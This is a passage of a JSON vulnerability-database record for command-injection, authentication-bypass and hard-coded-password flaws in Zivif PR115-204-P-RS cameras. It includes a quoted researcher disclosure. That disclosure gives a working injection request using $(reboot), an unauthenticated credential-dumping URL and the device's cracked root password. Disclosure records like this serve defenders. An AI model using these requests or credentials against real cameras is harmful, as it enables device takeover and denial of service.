    "data": "Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi\u0026-time=\"1504225666237\"\u0026-url=$(reboot) request. Zivif Web The camera contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the ZivifPR115-204-P-RS2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attack vector: Remote\nAuthentication: None\nResearcher: Silas Cutler `p1nk` \u003csilas.cutler@blacklistthisdomain.com\u003e\nRelease date: December 10, 2017\nFull Disclosure: 90 days\nCVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107\nVulnerable Device: Zivif PR115-204-P-RS\nVersion: V2.3.4.2103\n\n\nTimeline:\n1 September 2017: Initial alerting to Zivif\n1 September 2017: Zivif contact established. \n3 September 2017: Details provided. \n7 September 2017: Confirmation of vulnerabilities from Zivif\n5 December 2017: Public note on Social Media CVE-2017-17105,\nCVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. \n10 December 2017: This email\n\n\n-[Overview]-\nImplementation of access controls is Zivif cameras is severely lacking. \nAs a result, CGI functions can be called directly, bypassing\nauthentication checks. 
\n\nThis was first identified with the following request (CVE-2017-17106)\nhttp://\u003cCamera Address\u003e/web/cgi-bin/hi3510/param.cgi?cmd=getuser\nCameras respond to this with:\n\nvar name0=\"admin\"; var password0=\"admin\"; var authLevel0=\"255\"; var\nname1=\"guest\"; var password1=\"guest\"; var authLevel1=\"3\"; var\nname2=\"admin2\"; var password2=\"admin\"; var authLevel2=\"3\"; var name3=\"\";\nvar password3=\"\"; var authLevel3=\"3\"; var name4=\"\"; var password4=\"\";\nvar authLevel4=\"3\"; var name5=\"\"; var password5=\"\"; var authLevel5=\"3\";\nvar name6=\"\"; var password6=\"\"; var authLevel6=\"3\"; var name7=\"\"; var\npassword7=\"\"; var authLevel7=\"3\"; var name8=\"\"; var password8=\"\"; var\nauthLevel8=\"0\"; var name9=\"\"; var password9=\"\"; var authLevel9=\"0\nCredentials are returned in cleartext to the requester. \n\nOne last finding was that the /etc/passwd file contains the following\nhard-coded entry (CVE-2017-17107):\nroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh\n\nThe encrypted password is cat1029. \n\n(none) login: root\nPassword:\nLogin incorrect\n(none) login: root\nPassword:\nWelcome to SONIX. \n\\u@\\h:\\W$\nBecause of the way the file system is structured, changing this password\nrequires more work than running passwd. \n\n-[Note]-\nThe hi3510 is shared with a couple other cameras I\u0027m exploring.  The\nmotd saying /Welcome to SONIX/ has led me to speculate parts of this\nfirmware may be shared with other cameras. \n\n\n\n-Silas\n\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      }
    ],
    "trust": 2.43
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-108094",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-17105",
        "trust": 3.3
      },
      {
        "db": "PACKETSTORM",
        "id": "145386",
        "trust": 3.3
      },
      {
        "db": "PACKETSTORM",
        "id": "158120",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360",
        "trust": 0.6
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2020060066",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17105",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "id": "VAR-201712-0828",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      }
    ],
    "trust": 1.325
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:37:03.702000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://zivif.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-77",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.8,
        "url": "http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html"
      },
      {
        "trust": 2.6,
        "url": "https://twitter.com/silascutler/status/938052460328968192"
      },
      {
        "trust": 1.9,
        "url": "http://packetstormsecurity.com/files/158120/zivif-camera-2.3.4.2103-iptest.cgi-blind-remote-command-execution.html"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2017/dec/42"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17105"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17105"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2020060066"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://\u003ccamera"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-17106"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "date": "2017-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "date": "2017-12-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "date": "2018-01-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "date": "2017-12-13T16:50:24",
        "db": "PACKETSTORM",
        "id": "145386"
      },
      {
        "date": "2017-12-19T02:29:41.550000",
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "date": "2017-12-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-01-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-01360"
      },
      {
        "date": "2020-06-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-108094"
      },
      {
        "date": "2020-06-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-17105"
      },
      {
        "date": "2018-01-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      },
      {
        "date": "2020-06-16T22:15:10.037000",
        "db": "NVD",
        "id": "CVE-2017-17105"
      },
      {
        "date": "2020-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Zivif Web Command injection vulnerability in camera",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-011810"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201712-147"
      }
    ],
    "trust": 0.6
  }
}